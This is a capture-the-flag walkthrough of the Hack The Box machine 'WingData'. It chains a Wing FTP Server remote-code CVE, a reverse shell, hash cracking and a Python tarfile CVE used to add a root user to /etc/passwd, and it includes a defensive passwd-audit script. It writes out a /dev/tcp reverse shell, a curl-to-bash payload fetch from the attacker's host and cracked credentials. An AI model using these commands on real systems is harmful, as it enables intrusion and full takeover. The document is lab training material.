Hack The Box / LINUX / 2026-06-27

Hack The Box — WingData (Linux)

CVE-2025-47812 in Wing FTP Server v7.4.3 lets us obtain a reverse shell as the wingftp user. User data, including password hashes, are stored in XML files; we crack the password of user wacky and log in via SSH. User wacky can run a Python script with sudo. The script uses the tarfile module and `tar.extractall()`, and CVE-2025-4517 allows existing files to be modified, so we modify /etc/passwd to add a root user.

Target

  • IP: 10.129.11.92

Port scan

sudo nmap -sC -sV 10.129.11.92 -p- -v
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
|   256 a1:fa:95:8b:d7:56:03:85:e4:45:c9:c7:1e:ba:28:3b (ECDSA)
|_  256 9c:ba:21:1a:97:2f:3a:64:73:c1:4c:1d:ce:65:7a:2f (ED25519)
80/tcp open  http    Apache httpd 2.4.66
|_http-title: Did not follow redirect to http://wingdata.htb/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.66 (Debian)
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add wingdata.htb to /etc/hosts.

Initial enumeration

Go to http://wingdata.htb/.

There is a button labeled client portal.

It redirects to http://ftp.wingdata.htb/

Add ftp.wingdata.htb to /etc/hosts.

Go to http://ftp.wingdata.htb/

It is Wing FTP Server v7.4.3.

CVE-2025-47812 - Wing FTP Server

There is a vulnerability: CVE-2025-47812.

Here is a PoC: https://www.exploit-db.com/exploits/52347

Download the PoC and test the target:

python3 CVE-2025-47812.py -u http://ftp.wingdata.htb
[*] Testing target: http://ftp.wingdata.htb
[+] http://ftp.wingdata.htb is vulnerable!
python3 CVE-2025-47812.py -u http://ftp.wingdata.htb -c whoami
wingftp

Create a file named rev with the following content:

bash -i >& /dev/tcp/10.10.17.53/4444 0>&1

Start the listeners (an HTTP server to serve rev and netcat for the shell):

python3 -m http.server 5555
nc -vlnp 4444

Trigger the reverse shell:

python3 CVE-2025-47812.py -u http://ftp.wingdata.htb -c 'curl http://10.10.17.53:5555/rev|bash'

We obtain a reverse shell.

Let's check the users of the machine:

ls -la /home
total 12
drwxr-xr-x  3 root  root  4096 Nov  3 12:04 .
drwxr-xr-x 18 root  root  4096 Feb  9 08:19 ..
drwxrwx---  2 wacky wacky 4096 Jan 22 04:41 wacky

Harvesting credentials

Search the Wing FTP installation directory (/opt/wftpserver) for the username:

grep -nriE 'wacky' .
./Data/1/users/wacky.xml:4:        <UserName>wacky</UserName>
./Log/Admin/Admin-2025-11-2.log:15:[01] Sun, 02 Nov 2025 12:04:49 administrator 'admin' added a user 'wacky'. [1]
grep: ./Log/audit_db: binary file matches

In /opt/wftpserver/Data/1/users there are XML files containing user data. In wacky.xml we notice:

<Password>32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca</Password>

Grepping all user files in that directory for usernames and password hashes:

grep -nriE 'UserName|<Password>' .
./maria.xml:4:        <UserName>maria</UserName>
./maria.xml:7:        <Password>a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03</Password>
./steve.xml:4:        <UserName>steve</UserName>
./steve.xml:7:        <Password>5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca</Password>
./wacky.xml:4:        <UserName>wacky</UserName>
./wacky.xml:7:        <Password>32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca</Password>
./anonymous.xml:4:        <UserName>anonymous</UserName>
./anonymous.xml:7:        <Password>d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca</Password>
./john.xml:4:        <UserName>john</UserName>
./john.xml:7:        <Password>c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10</Password>

In /opt/wftpserver/Data/1/settings.xml we also notice:

./settings.xml:172:    <SaltingString>WingFTP</SaltingString>

Put the following lines (user:hash:salt) into a file named hash:

maria:a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03:WingFTP
steve:5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca:WingFTP
wacky:32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP
anonymous:d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca:WingFTP
john:c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10:WingFTP

Cracking with hashcat and SSH access

Hashcat mode 1410 is sha256($pass.$salt), which matches the SaltingString appended to the password:

./hashcat/hashcat -a 0 -m 1410 ./hash ./rockyou.txt --username
./hashcat/hashcat -a 0 -m 1410 ./hash ./rockyou.txt --username --show
wacky:32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP:!#7Blushing^*Bride5
anonymous:d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca:WingFTP:
ssh wacky@wingdata.htb
# Enter password !#7Blushing^*Bride5

Sudo permissions

sudo -l
Matching Defaults entries for wacky on wingdata:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User wacky may run the following commands on wingdata:
    (root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *
sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py --help
usage: restore_backup_clients.py [-h] -b BACKUP -r RESTORE_DIR

Restore client configuration from a validated backup tarball.

options:
  -h, --help            show this help message and exit
  -b BACKUP, --backup BACKUP
                        Backup filename (must be in /home/wacky/backup_clients/ and match backup_<client_id>.tar,
                        where <client_id> is a positive integer, e.g., backup_1001.tar)
  -r RESTORE_DIR, --restore-dir RESTORE_DIR
                        Staging directory name for the restore operation. Must follow the format:
                        restore_<client_user> (e.g., restore_john). Only alphanumeric characters and underscores
                        are allowed in the <client_user> part (1–24 characters).

Example: sudo restore_backup_clients.py -b backup_1001.tar -r restore_john

The script takes a .tar backup and extracts it into a restore directory.

It validates both the backup and restore-dir arguments against the patterns described in the help text, which rules out simple tricks in the arguments themselves.

For backup and restore directories it uses:

BACKUP_BASE_DIR = "/opt/backup_clients/backups"
STAGING_BASE = "/opt/backup_clients/restored_backups"

We can write to the backups folder, but not to the restore folder. The script uses Python's tarfile module and tar.extractall():

with tarfile.open(backup_path, "r") as tar:
    tar.extractall(path=staging_dir, filter="data")

The data filter is designed to block path traversal, links that point outside the destination, and other unsafe members.

Checking Python version:

python3 --version
Python 3.12.3

Searching online, we find a vulnerability in Python's tarfile module: CVE-2025-4517.

CVE-2025-4517 - Python tarfile module

PoC: https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f

Using the PoC we can modify existing files. Since the script runs with sudo, the extraction happens with root privileges. The idea is to modify /etc/passwd to add a root user.

cd /opt/backup_clients/backups/

We copy /etc/passwd locally:

cp /etc/passwd .

We add a user r00t with password Password123:

pw=$(openssl passwd Password123); echo "r00t:${pw}:0:0:root:/root:/bin/bash" >> passwd

We modify the PoC script CVE-2025-4517.py to overwrite the original passwd file with ours (see the attached script CVE-2025-4517.py).

Copy it into /opt/backup_clients/backups/ and run it:

python3 CVE-2025-4517.py

This produces poc.tar.

Rename it to match the expected backup_<client_id>.tar pattern:

mv poc.tar backup_1.tar

Run the vulnerable script:

sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -b backup_1.tar -r restore_test
[+] Backup: backup_1.tar
[+] Staging directory: /opt/backup_clients/restored_backups/restore_test
[+] Extraction completed in /opt/backup_clients/restored_backups/restore_test

Check:

cat /etc/passwd

We see:

r00t:$1$o7C749dd$CefPQKA.696u48JenDJWa1:0:0:root:/root:/bin/bash
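A defender's counterpart to this step, added here as an example and not part of the writeup: a small audit of /etc/passwd that flags exactly what this technique leaves behind, a second UID 0 account and a password hash stored inline instead of in /etc/shadow, plus duplicate UIDs and malformed lines. The sample passwd content is constructed and the hash in it is a placeholder, not a real one.

```python
# Constructed sample: the r00t line mimics the shape of the entry above,
# with a placeholder where a real crypt hash would be.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
wacky:x:1000:1000::/home/wacky:/bin/bash
r00t:$1$constructed$PLACEHOLDER_NOT_A_REAL_HASH:0:0:root:/root:/bin/bash
broken:line:without:enough
"""

# Values in the password field that mean "look in /etc/shadow" or "locked".
SHADOW_MARKERS = {"x", "*", "!", "!!", ""}


def audit_passwd(text: str) -> dict[str, list[str]]:
    """Flag extra UID-0 accounts, inline hashes, duplicate UIDs and malformed lines."""
    findings: dict[str, list[str]] = {
        "uid0_aliases": [], "inline_hashes": [], "duplicate_uids": [], "malformed": [],
    }
    seen_uids: dict[str, str] = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:  # passwd(5) mandates exactly seven colon-separated fields
            findings["malformed"].append(f"line {lineno}")
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name != "root":
            findings["uid0_aliases"].append(name)
        if pw not in SHADOW_MARKERS:
            findings["inline_hashes"].append(name)
        if uid in seen_uids:
            findings["duplicate_uids"].append(f"{name} shares uid {uid} with {seen_uids[uid]}")
        else:
            seen_uids[uid] = name
    return findings


if __name__ == "__main__":
    for category, items in audit_passwd(PASSWD_SAMPLE).items():
        print(f"{category}: {items}")
```

On a real host the same function runs over `open("/etc/passwd").read()`; pairing it with a file-integrity watch on /etc/passwd (auditd or a checksum baseline) catches the write at the moment it happens rather than on the next audit run.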

Login as root:

su r00t
# Enter password Password123

We obtain a root shell.